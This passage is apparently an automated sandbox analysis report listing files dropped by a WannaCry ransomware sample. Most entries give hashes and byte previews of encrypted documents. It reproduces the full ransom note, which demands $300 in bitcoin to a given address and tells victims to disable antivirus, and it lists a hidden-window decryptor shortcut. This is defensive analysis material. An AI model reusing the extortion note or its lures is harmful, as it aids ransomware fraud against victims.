                                                  Preview:WANACRY!....vR.%.G..4.C6D..#...c0..h9...W...O...]EvZc..Jr6....o?.#/.4.(.....V.m..Gl.+Xe....i...f8Y.Q.-M..1R.p.4.kj<.........y oe...........`5].;.~T.N.QQ.D..~...2..w.....4.v2BmUfN.....]%....."...\...`(Zv.8..T.1\_..S.Dy..p5......%.%T..qL..lt..Z..05{.R................u...O..0.|....1....X~.}.."a?.2.#..w..,.......c,.@..".><.|l%..L4'.]+..i\56.{*.z._'..X.m.j.7..._.Q.Zb@7.|...wEL..x/.{.k..o...|..}..Qd\T...B.-.j....."ei.:.Z0>i=..$..Zb././XGMpyZ.o.jtM#}/.%..uk..ek.f/.-...QV.j...*...7<.....f...*..N.u..B...Pz.x..gD..T.$h(5%...+.f..F..>.o8...TUz..4......?..#..N(.]..k..E.<=E.O.[...0...@...B...h...1xj........a...6'T..BV`..x.W.'?..:m.....SS..'.z...1......O\{c.y[.1)....xuX...^Z.......*.]z..j<}.....d.nI.g....0.....e.R.F_....fS........T..X.m....)..v.6?.......zg..W....n^....p..e/[..j.IN.e:Un.e5C..1..@3.;.oA...|....lc......e.m...V..D...L&..v.......3....5.......m.S...X.....O.@\.wP]-...7....h..OG.G....Z.).(.......JF..-T.E.j.H...u..H..OC...s.U...pv/JT...u

                                                  C:\Users\user\Documents\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826806008416017
                                                  Encrypted:false
                                                  SSDEEP:24:bkFzTKynCCvRoRSn1/LJDTD3cVOu19UrKoahB2mYt59BGpBcx7d7Xh/1Pl8I:bkFzeynCCGR4J73Ju3U+PC/ySJXh/1OI
                                                  MD5:BE4918347EF43FD8FF639AF59B9B2FD9
                                                  SHA1:CBB7C1DF73A2B696E47832178D00FF6ADF73A9F2
                                                  SHA-256:3508FDC65A3A8DE02E63B0F62D404D7ABAF897413EAE1003AC265BEDE018C6BC
                                                  SHA-512:517213A7D92DD8D165EF457F67E78B3AE468BDA02793C88B6B4EEE47D9EE76583A82CD0453E1F2FE061023FC44411E06F6A6586159ABEACCDC5E989B0A335C3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....vR.%.G..4.C6D..#...c0..h9...W...O...]EvZc..Jr6....o?.#/.4.(.....V.m..Gl.+Xe....i...f8Y.Q.-M..1R.p.4.kj<.........y oe...........`5].;.~T.N.QQ.D..~...2..w.....4.v2BmUfN.....]%....."...\...`(Zv.8..T.1\_..S.Dy..p5......%.%T..qL..lt..Z..05{.R................u...O..0.|....1....X~.}.."a?.2.#..w..,.......c,.@..".><.|l%..L4'.]+..i\56.{*.z._'..X.m.j.7..._.Q.Zb@7.|...wEL..x/.{.k..o...|..}..Qd\T...B.-.j....."ei.:.Z0>i=..$..Zb././XGMpyZ.o.jtM#}/.%..uk..ek.f/.-...QV.j...*...7<.....f...*..N.u..B...Pz.x..gD..T.$h(5%...+.f..F..>.o8...TUz..4......?..#..N(.]..k..E.<=E.O.[...0...@...B...h...1xj........a...6'T..BV`..x.W.'?..:m.....SS..'.z...1......O\{c.y[.1)....xuX...^Z.......*.]z..j<}.....d.nI.g....0.....e.R.F_....fS........T..X.m....)..v.6?.......zg..W....n^....p..e/[..j.IN.e:Un.e5C..1..@3.;.oA...|....lc......e.m...V..D...L&..v.......3....5.......m.S...X.....O.@\.wP]-...7....h..OG.G....Z.).(.......JF..-T.E.j.H...u..H..OC...s.U...pv/JT...u

                                                  C:\Users\user\Documents\ZQIXMVQGAH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814963475003599
                                                  Encrypted:false
                                                  SSDEEP:24:VAwE2o5O3DTvy0NBdNtbyFTvd6r48d3fcq4/id0xywp:m5OTTv9HtbyFo48Bf3d0gwp
                                                  MD5:FAD97FEE497B18A3CB162EE30412AEF9
                                                  SHA1:10061238E99FF77599BB41DCF5AB1E84A961FD17
                                                  SHA-256:02FA6DFAA627BEB9A7742FDDCD78785168E83C5A063615F2EA6422ACA4B2C7CB
                                                  SHA-512:62CFD2E7F33A674957C372A410590A7049272091BFEF7A0A5D69A409CE29816D0BF6D670F362C4B1B0708EECE9B0BD2B5A55D944A0A8C91A3E5C309C7C39D26B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:i..{...B%...T_$.k...t4.......x.D..U..k.....O.N.P.....K.,.....j.....d*.)...@QoaV...wi..S't.3l.../.f... ..K.c..".E.m..M..T=.]/&...o....8.sv/ii...y>k........o.aX......l[=.E...3.`0..v..f.}s.........f...........&..peG...@~..i....^.p0.....=.@..,?...|._.........C.}!.Y......>..y,...^...A"h.O"u.z.......=........D..1..*.r../.=|.Y.tD...Is.>..u....I.....X.c.........mL..o..73.....1...)$..Sq0%..A..&x..l.._O.....d.B :....'.N.pXQ.Z.uo.(.,1...<}.W.....[.%........>.V......t.gdQ.K.f....4Y.....8.....x....EY......\<Dh.F.s..EJ...B..R..Z.....Z.:0.2...}.I.,'|Q4.~9...QN..X..96`.,hs.....Ja.@..a.v....eAp4.>...c.gd(.Q...jL.+.(xr.."....Z..Q....q..3=L.)}oP....9...%...x....;.... ....2.}.n...x.?j........w`..a..!........'...y|g.s[3*.9K....a.o$.s...fO.)Rt.JaH`.....X...Ui..A..7.~a.6X.p-=.....=f....ZC.N.XF8.#7.a.ap:?...uQ.....R.*..c.;vY....W.....7C./L..<?Y....h...e.....4.X...[.X7.......:a_..9...).@...6.....0.. .U.5b..,/c.../=...aJ....g............!..l.R.....H.

                                                  C:\Users\user\Documents\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.82874237881211
                                                  Encrypted:false
                                                  SSDEEP:24:bkxEJZywLgrjRKeYROPcgCvHEqm39Zd6Xypmy3bRPJkvwxGNTPyDNmtc+phIPNU:bkxEJZywLsKRwPcgCvHEqm3nd6CmuPJU
                                                  MD5:0B96BC35D02087D2497748016AFFB178
                                                  SHA1:93ABAB2CC1FF2317BDFF969231733A4CAFF77453
                                                  SHA-256:35D6890000896DEE6A373E6A523CB523A3C17D3CEBC26201FE8007C0DB218EA3
                                                  SHA-512:CCA4BF0EC64C31E0BAEC003DCCA7133E5535F33B428FDF35CAA4411A2704C18E7ECABC7F6FD953AC3A6A74D416E51AFDADDE60A769F003289AF2DCEE28CE1B1C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....6.7....rdn.\2.NIp,.......l.-...y.5{)..._..9..2.....p.....!.J...).......%.ekw..:l.h......3....&N.>..j.7SnT....30.YO...P...Q....Y....:4..Q..I0CU>g.........;.\!.e........PBQ...&.a..Q....$0.^.{.%.mU.j..n.;..v..%e........y.z.xo....2'......D0.............R.!.K..k.Uo.7c.K.L..q.|-..S...q..]..k.mbXr......N.L....#^&.....~0.2tt..TWk......][....|.......mv..um:....#.>[1.'^.@1..A.M.....N.i.A..[w...H..#.Y.?.[~.?.....1.~.@~...R...#6w...........wt78.....F.........n#.....d..?....m>8.G.....R'w.v.*....%.Y...l....O.+/.O....k....e.Z5..%}..P..c'.d.H7].}...+?..=7.)...j.'...S<..b-...J...T.s..............l0Q....c}{...+w\..x.u..`.jl...p...t!tg.....:N...R3'....2!.cO.....\I.../.A........l'o..Y9....D. /..v.u.I%.....e...D....I...=..*"...z..b....0..G.Y&~...S.FA.*..m.q........z...|.L..=..b.q...Y....!.TJ&=Z.'hA>.s..S/....aB.`...%.8.d0K.O....fe.v.t.}).B.%....<Q.{(..%!h.o....L...nW.5.0.s[.S..p?3=+...`..!\..!.-.u2......uP...t6..(.d..>..Em.iFg..J..3....P1..8

                                                  C:\Users\user\Documents\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.82874237881211
                                                  Encrypted:false
                                                  SSDEEP:24:bkxEJZywLgrjRKeYROPcgCvHEqm39Zd6Xypmy3bRPJkvwxGNTPyDNmtc+phIPNU:bkxEJZywLsKRwPcgCvHEqm3nd6CmuPJU
                                                  MD5:0B96BC35D02087D2497748016AFFB178
                                                  SHA1:93ABAB2CC1FF2317BDFF969231733A4CAFF77453
                                                  SHA-256:35D6890000896DEE6A373E6A523CB523A3C17D3CEBC26201FE8007C0DB218EA3
                                                  SHA-512:CCA4BF0EC64C31E0BAEC003DCCA7133E5535F33B428FDF35CAA4411A2704C18E7ECABC7F6FD953AC3A6A74D416E51AFDADDE60A769F003289AF2DCEE28CE1B1C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....6.7....rdn.\2.NIp,.......l.-...y.5{)..._..9..2.....p.....!.J...).......%.ekw..:l.h......3....&N.>..j.7SnT....30.YO...P...Q....Y....:4..Q..I0CU>g.........;.\!.e........PBQ...&.a..Q....$0.^.{.%.mU.j..n.;..v..%e........y.z.xo....2'......D0.............R.!.K..k.Uo.7c.K.L..q.|-..S...q..]..k.mbXr......N.L....#^&.....~0.2tt..TWk......][....|.......mv..um:....#.>[1.'^.@1..A.M.....N.i.A..[w...H..#.Y.?.[~.?.....1.~.@~...R...#6w...........wt78.....F.........n#.....d..?....m>8.G.....R'w.v.*....%.Y...l....O.+/.O....k....e.Z5..%}..P..c'.d.H7].}...+?..=7.)...j.'...S<..b-...J...T.s..............l0Q....c}{...+w\..x.u..`.jl...p...t!tg.....:N...R3'....2!.cO.....\I.../.A........l'o..Y9....D. /..v.u.I%.....e...D....I...=..*"...z..b....0..G.Y&~...S.FA.*..m.q........z...|.L..=..b.q...Y....!.TJ&=Z.'hA>.s..S/....aB.`...%.8.d0K.O....fe.v.t.}).B.%....<Q.{(..%!h.o....L...nW.5.0.s[.S..p?3=+...`..!\..!.-.u2......uP...t6..(.d..>..Em.iFg..J..3....P1..8

                                                  C:\Users\user\Documents\ZQIXMVQGAH\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Documents\ZQIXMVQGAH\NVWZAPQSQL.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803180803604506
                                                  Encrypted:false
                                                  SSDEEP:24:h3XW4p5cI0k/PVFadDlyAcn5XctBAQZkKawlC:hHpp5c98PDIYfkBAQZkKawlC
                                                  MD5:DA322898E885F1E8C925EBAECB6045FA
                                                  SHA1:58BA19237E250CC0C338C7B54376C59A323D8CE9
                                                  SHA-256:9DD7C76EBD45BD9968855D56F4E0368C1EBB6C8554BE56AB9B41BA9DE5BAB3B9
                                                  SHA-512:BCA6C334B42D2D27C699646C0F815BDB70DA0741043C44E475E47130603BBDF167DD879D6933A2172829ACAEE51BAB96F3AD1BEC1B1BD754BE75C174EBF87864
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:A....Y$`.Pc.i..5.3W...!].........X..........Z.(.P.[._..{..Q.HfW...PP.N...;..?..~..=5m....J...{......w..../.......B......@.fb.Bi..O..F<?/...#k .h.GH.PB/.......a........P..aFR..e[..3...j...+X.A..V.Al..8..{...%.Jw.5.T...fb...6.k.o^....0]..".89. :.N...s.M...@1.=......h)z.`[@..r;.hhb.!.6%.y..m..m....20..U...U..l.&S..../..tW....:%dn.d.Q.d7L..T..5..o....).M.5..9U.....8J.....#^u.........hJ...xu.z..wn.Q.>....u..n_....C.+5..B...B..u3/.-. ../..z.J.........L..._..0d... ..M.%.0..w.]fj,.5...@.6S...M3W.6.K....3.o?....[.QD..`D....eo&....&g7V.A.P......u'..4.oT....+.A.6^....;..0..i.@.......!........+x....s...L.VL[F5.."..*......?l.c.+a.1J.+5....:s..g.|M.kd v.t'g6..#.B.P.(y..C.CC..}..Ik...y..x..I.H.h..N...L...P...+?..@o>$q.....n..hw.....s......n..)..T.28^Q.'....LP.0R;!.#@.F........~P.....R..}*.1.....t..e.S...=,.....tY....>....P.+..].M......n.9]#.o .-*,35.4.Syp..........'....R.bt.Aw. .8...a.c..%.pT.J8.3..2...p.,.>.8..R.V./.2...J=...+.0.h`..0.; .......I.>'....L.e.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\NVWZAPQSQL.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8429758708201165
                                                  Encrypted:false
                                                  SSDEEP:24:bkO3c3teyzOzHJR4Ka64j0gY31qrMdG/rU6ernI/PsPNXJiip0CO9c:bkOs3tesOzHJR7+j1oqrMdG/rIrI/PsB
                                                  MD5:E074E71D514FECFA16C12F4BB61544BA
                                                  SHA1:F3BE4310D0336455434BF9BC2A7B2C1137850936
                                                  SHA-256:F8EDA44D757DF38DCBF85908CDEDB5DCFCBB5B6402351A343752C68C57AF9993
                                                  SHA-512:6D9286C84F852864FB9C09CAE3CF8B276C57209841C02E935CB25C2076230CAE10502FE3C03037EB7A0EB417616203596DB16B3008E2E60CC5B455DC499302D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....a(g...=:...+.G..X".`#.0=.N~i...A-M...O.V.UL..#C.jO.....=.i.2.$.|.m.?.Y.....(8..1R..Z......fw?..y|..fREU.)s...b.C,e.b..<..3/....d......?.4.1E(....o.>R.........7.H...#....^.[m.<.....Trh..`.G.[...4.<9^_...w.<l^.....D..ik*<...W.?.J.{....#~).............<....\.[=q..4I......a.<..;......j...(..i'}.x...$F)..7..]....M3'.b=..a....}.j......&..tP..(.JcO.\U..{..blKO..9.5b_....._(]1..V....!.)./..[T.GP..5.oiV.Z.{..d..Z..B.%.h...n.o.....I....|...]>&.a........r.....k!.^........R.....o..V...Y..r...({.n.]T. ..(..il.|;..k..~%?/...../I....*.u.-.N...c..u..\H......D/.....'.~.:'....(.B.c*.V...V...C.....Z....f......qZC.i.*.8.2.,.O..Q..3K..e....G.. ....q.....(L.{X.[.&S.l..L...%..J.<.-{#k..b.z]..%nt.\]....1.N..P...f`5..|.]..P).8r.]Y.F...F..D..[.J(B.}.D...%..K{r....S.Zc../.......\.."...1.uNV....l.5.D.Y......"....b...!...z..k.G..w....h?...~.Z..C2.......c..q.bH.ey-5..8...e.../mG*v.Y.x....f..Z..v....6m._..1oA..T..n.......1..X...R..VQ<..l'tW.H....y... ..]U.7.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8429758708201165
                                                  Encrypted:false
                                                  SSDEEP:24:bkO3c3teyzOzHJR4Ka64j0gY31qrMdG/rU6ernI/PsPNXJiip0CO9c:bkOs3tesOzHJR7+j1oqrMdG/rIrI/PsB
                                                  MD5:E074E71D514FECFA16C12F4BB61544BA
                                                  SHA1:F3BE4310D0336455434BF9BC2A7B2C1137850936
                                                  SHA-256:F8EDA44D757DF38DCBF85908CDEDB5DCFCBB5B6402351A343752C68C57AF9993
                                                  SHA-512:6D9286C84F852864FB9C09CAE3CF8B276C57209841C02E935CB25C2076230CAE10502FE3C03037EB7A0EB417616203596DB16B3008E2E60CC5B455DC499302D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....a(g...=:...+.G..X".`#.0=.N~i...A-M...O.V.UL..#C.jO.....=.i.2.$.|.m.?.Y.....(8..1R..Z......fw?..y|..fREU.)s...b.C,e.b..<..3/....d......?.4.1E(....o.>R.........7.H...#....^.[m.<.....Trh..`.G.[...4.<9^_...w.<l^.....D..ik*<...W.?.J.{....#~).............<....\.[=q..4I......a.<..;......j...(..i'}.x...$F)..7..]....M3'.b=..a....}.j......&..tP..(.JcO.\U..{..blKO..9.5b_....._(]1..V....!.)./..[T.GP..5.oiV.Z.{..d..Z..B.%.h...n.o.....I....|...]>&.a........r.....k!.^........R.....o..V...Y..r...({.n.]T. ..(..il.|;..k..~%?/...../I....*.u.-.N...c..u..\H......D/.....'.~.:'....(.B.c*.V...V...C.....Z....f......qZC.i.*.8.2.,.O..Q..3K..e....G.. ....q.....(L.{X.[.&S.l..L...%..J.<.-{#k..b.z]..%nt.\]....1.N..P...f`5..|.]..P).8r.]Y.F...F..D..[.J(B.}.D...%..K{r....S.Zc../.......\.."...1.uNV....l.5.D.Y......"....b...!...z..k.G..w....h?...~.Z..C2.......c..q.bH.ey-5..8...e.../mG*v.Y.x....f..Z..v....6m._..1oA..T..n.......1..X...R..VQ<..l'tW.H....y... ..]U.7.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PIVFAGEAAV.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826449049195866
                                                  Encrypted:false
                                                  SSDEEP:24:gVU1czT74CGq1AsY9soc6VhdN+9v/Ob5osBFhgSsCtY0+rrHLN:wUi+J3sP6VRCv/ONPRY0+rHN
                                                  MD5:5EAE5DD5F9B748505540325FDDEB0E9A
                                                  SHA1:A23C2D51C11705DA4964A8F0EDCD4A1E3A9216BD
                                                  SHA-256:034F87826F2B31CAAFF147717562C70AE2864A5743BBA209B4C77A06F8CDCA74
                                                  SHA-512:80BB34F1D5DA45ED32869FA03C385AFBEADB70D43C89E97684B3F22E9BEEFCDD8257056A1A00C6D03F73DB97D85B5399A6D940D125523F36B17D5A86F9874439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..e...}.<kW....:4`..1c..+l.......r_.{,2y..2..(....>.......QdH..$M..{.1Z...5h.....J.j`..{b...s5r.U..Eh......N..(n&.v..... .......>...th....b.}I...qF..T.:=....c.=..I.~........v.G.gF..T..t..X.....S.~..)/..W....j...>+.(...F8.'...../.....n..G.:Q).....{Q.q.c.. r....o..?...so...U....>_&..!yu./.....=.....H...JcPE]...wE#...Q9.....4..`p..x.Z.*S.g^E6-.}^..w.D.zM.KR......L-.1*.WX:a...T.?o.j..i...c.....CR.^r.v.0^X.!..E.+B........(O..q.D.oO3v...T.......S-..5...%........]^.;Dzb60'.u.9@EcCjE.....9...}..#M...b@..Q....r.p....k.@....S'..,!N....!V..6...Y9z.{...w..)..5....V>..g.V.....1........HY$..Fz.K)....&.p.I...V...g.............>j.+-..pqk.|...a.4..5.......7=.k.S..55B..........= ..A..x....E>.&...xE..d..*.R.l`f\.<.&.M{...U........n..4gw..N...\.&F.4.....D.S._.C.K...z.rj...*NoZ..Z.%X.....hj)~0......&..?...H.....Q.d...!k.B.E. .%v.O..8..K)}..4...`.P]D..w...m.....Ez.....R..$...:....h.[..2j......'..za...[.^..o.<..J.N.:L.....x.....i..hfB..(....a?D%Lk.C...:m.`..

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843721583861324
                                                  Encrypted:false
                                                  SSDEEP:24:bko5lBAoqy/YEnHyneYImH6l8V6722Kfrz3HSpxI5YdsFw92I2YULqfet6MmLWpt:bkoSo/YoynFsuE7WrzYIiKFw92IWLYcL
                                                  MD5:B6942840DD3DF9144225ADC44C954294
                                                  SHA1:98FC1B9DD9FFF28B8DF0B5E65582526F966098DD
                                                  SHA-256:E403B56A1BB3EA2605FB8F53AA07D94E5945A712B57B0B3FD95806A4DB57461E
                                                  SHA-512:33C167B2F84D28F23A1C8B9559426107E23B5633C91128981B523B6F381A96269B87CE84206D24D1D6A177B8CBD42C63EF47B5231ACB3C7FBB8C4FACC773A50E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....20.<.iN../._...o.h.h.T...[....^3W..........$....FE.U.Dm.a,0.L..]...,.c..h.......H....;...yU*..6....E......b.^W+.HL..V.....z..d...O..0"....5.yhV.nD....7...s...>._. ....X..+.m.E..bu@.Pw...u. .s.I)..7...Y.Y;BZy....I.ug.n..\!H#I<.r...7K..9 e..}..N..............K...L+F.I..j.....7.a.5."n..G.UN.-...zG....?...L.....8FG3....4..[...K....&gU'M...}{.B..gsx..,?..UX..dF....RF..'4..id#.Zz......W........9........V].:tD4.%....3....o..N..l4.E!..BX. "}.P....>GI..8.m.UZ4....5....Qf....hl@.....b..6.M..`....Y.H........>....M.V'^o...!.........tF?c"1..."!xl.)......D*8.{h3.40L%.tH..7..5S..I;...K..{....We..9..?y.O.I..f.Ck2..s.......=K..c.F{ ""5{ .0..]..u...YY....].bh.....<4M*..9p*./..-.B..$w1.!.B.....6Qq.W..$w..].'%P.T...."4...._....Iy7......+..F.5:=.}.......B....V"P......{._c#.g....\.ZW.=.zT...S.VS...H...`.....d..2?,"M..k...n.s.4;...........Z_...R*#.....@.H....R}i....GM......P#..L.......H..[."...F.[.dt.{.1.Vb..G\-.....^f.P#.+...$.=....t._![.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843721583861324
                                                  Encrypted:false
                                                  SSDEEP:24:bko5lBAoqy/YEnHyneYImH6l8V6722Kfrz3HSpxI5YdsFw92I2YULqfet6MmLWpt:bkoSo/YoynFsuE7WrzYIiKFw92IWLYcL
                                                  MD5:B6942840DD3DF9144225ADC44C954294
                                                  SHA1:98FC1B9DD9FFF28B8DF0B5E65582526F966098DD
                                                  SHA-256:E403B56A1BB3EA2605FB8F53AA07D94E5945A712B57B0B3FD95806A4DB57461E
                                                  SHA-512:33C167B2F84D28F23A1C8B9559426107E23B5633C91128981B523B6F381A96269B87CE84206D24D1D6A177B8CBD42C63EF47B5231ACB3C7FBB8C4FACC773A50E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....20.<.iN../._...o.h.h.T...[....^3W..........$....FE.U.Dm.a,0.L..]...,.c..h.......H....;...yU*..6....E......b.^W+.HL..V.....z..d...O..0"....5.yhV.nD....7...s...>._. ....X..+.m.E..bu@.Pw...u. .s.I)..7...Y.Y;BZy....I.ug.n..\!H#I<.r...7K..9 e..}..N..............K...L+F.I..j.....7.a.5."n..G.UN.-...zG....?...L.....8FG3....4..[...K....&gU'M...}{.B..gsx..,?..UX..dF....RF..'4..id#.Zz......W........9........V].:tD4.%....3....o..N..l4.E!..BX. "}.P....>GI..8.m.UZ4....5....Qf....hl@.....b..6.M..`....Y.H........>....M.V'^o...!.........tF?c"1..."!xl.)......D*8.{h3.40L%.tH..7..5S..I;...K..{....We..9..?y.O.I..f.Ck2..s.......=K..c.F{ ""5{ .0..]..u...YY....].bh.....<4M*..9p*./..-.B..$w1.!.B.....6Qq.W..$w..].'%P.T...."4...._....Iy7......+..F.5:=.}.......B....V"P......{._c#.g....\.ZW.=.zT...S.VS...H...`.....d..2?,"M..k...n.s.4;...........Z_...R*#.....@.H....R}i....GM......P#..L.......H..[."...F.[.dt.{.1.Vb..G\-.....^f.P#.+...$.=....t._![.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PWCCAWLGRE.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79232013754835
                                                  Encrypted:false
                                                  SSDEEP:24:oZxl81JpnmwfXXJMj7LhP84SSdtI94Drob3wMV94wvowVOdg9VJ5Q:+xomwRMTpnVqwRMVxpJi
                                                  MD5:8E835949F0D8BE5FE6AC747F00599727
                                                  SHA1:0A011CF3D8E0ECBEA4AEED70E1D7BA3A1A5E9929
                                                  SHA-256:57E6E4D594C412378F534977FFF1DCC758A90A97A8F7D7CBED5A44F7615092B8
                                                  SHA-512:27E2DCB2F5A37190364239CB176F5A6B3A8A29949C5E93629E5DADE513A1836070B26434231B5BCEF67D3602C2E4BCEB0D76DECDB0357C8BF0E7113450D3FBA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:5s9...A].c....o j.s.....1M$....69}.}n>...7.1..@..w4.8....O9....i.f..[%..<.c+j....L...#.?.....:U..`a.....B.\K....vY_./...-.`'4Y...2TE.~.l..D..e.uz.=M......&...$(c...K...s1..~Z.H...k.<....U..N5..f*..m..[..%..Z_Rd.....wCs.J...5.r...~T.E..n..m.....[f.j.Ku:...4)g..#...w.&'....O.0..].....r..mx6.V9.7..^k..!....(0\..>.+..aXH.......V.lQ.....@.t\..-.s1.nR"...Y.b|g...b[B..f..V..>j....!....b.|..`.......t..-D.b.DCT@...6.1s.Ms..a...-...9Q......q".........!q{q.%.......o.0.X|.'.........c...|..+.... ...<`.....yC.=...5..V.m>g.PdY..\.........[.4...G...q.0e.N]z...~.:....t.U.I.u.....Z`..y.?.XE(J.<.Z.....a..u}.....NN.F.U2........[.!e....'..T.?*....Uz.E.....T.%........_...i(..z_...Z..S..K.(...<L.....wBMt0..i{..b.7.}..muo.;..O.NG.&..3..]r......!3N./..Y..K&=.:(,.@.{Dk...I.Zu'.....f...Qy.NZoh{"...u...\(.%..1...j:...a.e..}.R..w.y..\.......1. ..}.X(.. .>...A..0.oVu.......0$vj.Aw.i;..x...m8...D.a....C-1&......L..P..%2....h.3&%.f......@.]...Z.S....E....xr......=~...Z.*....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8313791005395545
                                                  Encrypted:false
